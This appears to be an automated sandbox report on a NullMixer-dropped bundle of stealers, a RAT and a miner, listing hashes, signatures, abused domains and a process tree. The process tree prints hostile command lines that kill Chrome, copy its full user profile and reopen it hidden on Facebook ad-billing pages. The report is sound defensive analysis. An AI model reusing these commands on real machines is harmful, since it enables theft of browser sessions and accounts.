| MD5 | 0e64fddae4ba26ec0a154f40c8951e26 |
| SHA1 | 0d84a0ba8d4013b8166c32405d5eaf0ba9f50f2b |
| SHA256 | 9d2f317389f2c4156e1add71f489c14acfdf45b2a0d7e1dd54eeeaaf5d84142a |
| SHA512 | b00e039aa8dea1a8de066f9e05cbd665ea748e68cde4edbd3012fa7a71243253a45a706a032eb47a126fd5887a1ffcdfaa22f09bb807609f63aab7e7fb813f6c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2a8a3b06e6f4a157111833c1b020e085 |
| SHA1 | 520668878637127213a1d2a9247d32e387fb425a |
| SHA256 | 3f694482baf354d900ccf2914ead878e31c851f74a9e9ce37b09c7b14d3a6710 |
| SHA512 | 94ef9ad7a3c5e3bc6bf9c30c5d771445804bd2c0b380b8de8b2fe3473499ab6f26dbcc415f183c8f713701857f9ba253168275bd940fea2d288a42d98a9c6869 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fc08e43481a3603b8bb36aa4961c5f7d |
| SHA1 | a4238d6984c1816fecb596cbb7e4b3ba49dcba6c |
| SHA256 | 0359032be9cbfdbd07427d534c606c13f4ccebbff4566ac7d58d2af56318a4e5 |
| SHA512 | ecd8d1ea1c07bf28a62f6ed118c1399afd43bd6a36d182776436bd12532dd1e705e607bf17394da72ff84ceef2bf7f5a090bc0e67f1ac092f6f61df2c4b74414 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9a00ca000b2322b39bf015e893fd47a9 |
| SHA1 | b4a7b6288f792c501a3bca487055d53bef60bb03 |
| SHA256 | cf0c478f091727c496c5651ff678e48106372ff058b7fa13eb313a6dfbab28a1 |
| SHA512 | 5a7178d52d2f2f1a894399bc90774761767c01e13b635676cecd4238315ee2b5550ea0f60161d6b349787c7c54825f1ebdf8be15126a270f74e03e9748ff4938 |
memory/3068-846-0x000000013FBB0000-0x000000013FBB6000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 686bb34a8be7bd32f2f8bb48211a644a |
| SHA1 | 43c393eabe988d705c28d21c9842cba5bbfa8741 |
| SHA256 | b821073d5c02e48a769aef7782aaeeb44b75149ddd45265551551e9d632027a9 |
| SHA512 | 39df26d7dff1f96de6da7b2a8a98e67912fe885aa78b126c4ed853c15577dfa52ab0da1a05f5eae6f389372e2af648bb0f365de3079072912b1b205d6db45401 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 609656137bdb8cebc9b194577ebbba51 |
| SHA1 | 9800c7232b1f7948724294b572bf68669809a698 |
| SHA256 | e86d9a1c7efd308ec5b0134314fcac94338c8704c77269bb79b4cc79656c2db2 |
| SHA512 | ea7a7cc113288cf44a1457ab44e52bd8d5abc3a99d4f1b07f5d5fd2130efef5a1e5c161abf5b3729e5e5c6520783091d640ba40ab8f7a79bac770b1741694665 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c23be4d937ffec1091ff043f71d273d3 |
| SHA1 | e72c8b9fd3385cc3bcbb3171cfa075a76fb436d7 |
| SHA256 | 5121ee2d227d45fff826a2dc2650913af9064ad808921ac7e287603569539766 |
| SHA512 | 29ae6ee40624e328eeec25156e4f8eaeb17ec5e384d8bb733653e594b78fe63b2dd6eb91e3e168ed27da7b3a58faa4d0036be8320981c2f9377050b6c25bf043 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 805218a660dc592c1bbfb29c5d3f9c2a |
| SHA1 | c99352fe5017d2ed8152d9257c69fa2aeac5c403 |
| SHA256 | 7d968a25d5657da9119c8d2bde3719d7a8d105b112de382e9e4e8fbe1423a1f5 |
| SHA512 | c2d9d54e56be6e4db8ea9a0a8f8cb9d9d47615be7635c5e3d67f49bbbc86e36a0c875204d0ad9c91b570c63482a77c61ab505d4da167f6d9b2226aae1f611063 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 80dde503e4f1e52ad50d7ee6834cac37 |
| SHA1 | 088e09c54eb773faca0b288640d67beddba337fb |
| SHA256 | 9f17a29d31ff2f1d7b164ae3bf0306ddd02884f5cba6adebd0066aac1c6b62f1 |
| SHA512 | fc32f0959f73dd58bfdc82d01cd2ef901c3ff0232e82cb6a0772f4c09e43138b6319430c0c0f19088660338da7d4206887880666b3d7170a66228c1b82ab7c36 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b75d615790f469363dab52806923ef9f |
| SHA1 | 5a1dc3e3936f30240888c3f071e5d0d19def7bac |
| SHA256 | 273bcfbab5f36b75d2b114a7e1cce335ec6cf78f1609d4b81dfa2fcf5c3e5b00 |
| SHA512 | 0f1b3400f397622296e1df59bb91821a6b381b37e7efc466cf63c34f3d396bb1ca351f3d27529c5d69b9d7959d176f2d757313857c4949fc4b56de783ebd1050 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fcc78125662c1416ab1ca5fd5c7cfe6a |
| SHA1 | 7ff419ea1d4fb5e5c902ba36fb6a137079617b44 |
| SHA256 | 9e6fdf4282b9610f19e8461ce540598bbe67fa85a403eec799c454b506e63b40 |
| SHA512 | d8c346a8bab078db83cd1eee9181d7d99bb3000f32306695cffea9e0b1fb5df996227b22d0c1cd5adba851374bd20f8df6c6a1fb9786188b54de825427ee6cb9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a09fcbb80190428a3b486d3a41a085e1 |
| SHA1 | 15edf2becd32e46cab7b6cd3ab4ce828ab34708f |
| SHA256 | 46a2d43b5f46c8c14300f057defec6f5930240a0cd3d3af16d27f531af5b684d |
| SHA512 | 4cec0c21789e5a5d386caffd7cec24004d3abc05ea05c81f10c5c2818a33906e11a59fde0d6cafd2d2901b95d8388ba86ad5b09f80d4f615ba7dc8e77082d639 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0c49194880e0acedd1b80df00d25228e |
| SHA1 | 9addcbb9e037f5106b44263fe554bc892becb4ec |
| SHA256 | 91cf49ffb0f14703a7b2b2d10f63b072715f2fd88987461fabeddeacd4f25d80 |
| SHA512 | 48bc89f1927d1a20115310825f5fb33b73177e38da21ad9949ca7fcd2519be88430e1fcefdce1ba11247ac46ae5533298360b799698b0ca8011060c197a1339a |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-25 09:33
Reported
2024-11-25 09:36
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Vidar
Vidar family
Xmrig family
xmrig
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e010.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\chrome2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe | N/A |
Reads user/profile data of web browsers
Accesses 2FA software files, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e1.exe | N/A |
Checks installed software on the system
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4464 set thread context of 1428 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe |
| PID 2828 set thread context of 5188 | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | C:\Windows\explorer.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e010.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 08240101651be7e1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 9aa6e16872.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 1710990cbc64.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 53516815d3135fe3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c c862a054a35.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 4f5baa1083db067.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c f34b9ab9db6d16.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c e4b2f18fb52218.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 453c5fa76a849.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 08240101651be7e010.exe
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\4f5baa1083db067.exe
4f5baa1083db067.exe
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe
1710990cbc64.exe
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e1.exe
08240101651be7e1.exe
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\53516815d3135fe3.exe
53516815d3135fe3.exe
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\c862a054a35.exe
c862a054a35.exe
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe
9aa6e16872.exe
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe
453c5fa76a849.exe
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe
f34b9ab9db6d16.exe
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe
e4b2f18fb52218.exe
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e010.exe
08240101651be7e010.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 396 -ip 396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 396 -s 564
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe
"C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe" -a
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732527219 0
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2936 -ip 2936
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 356
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc4f43cc40,0x7ffc4f43cc4c,0x7ffc4f43cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1952,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1928 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --field-trial-handle=2188,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1776 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
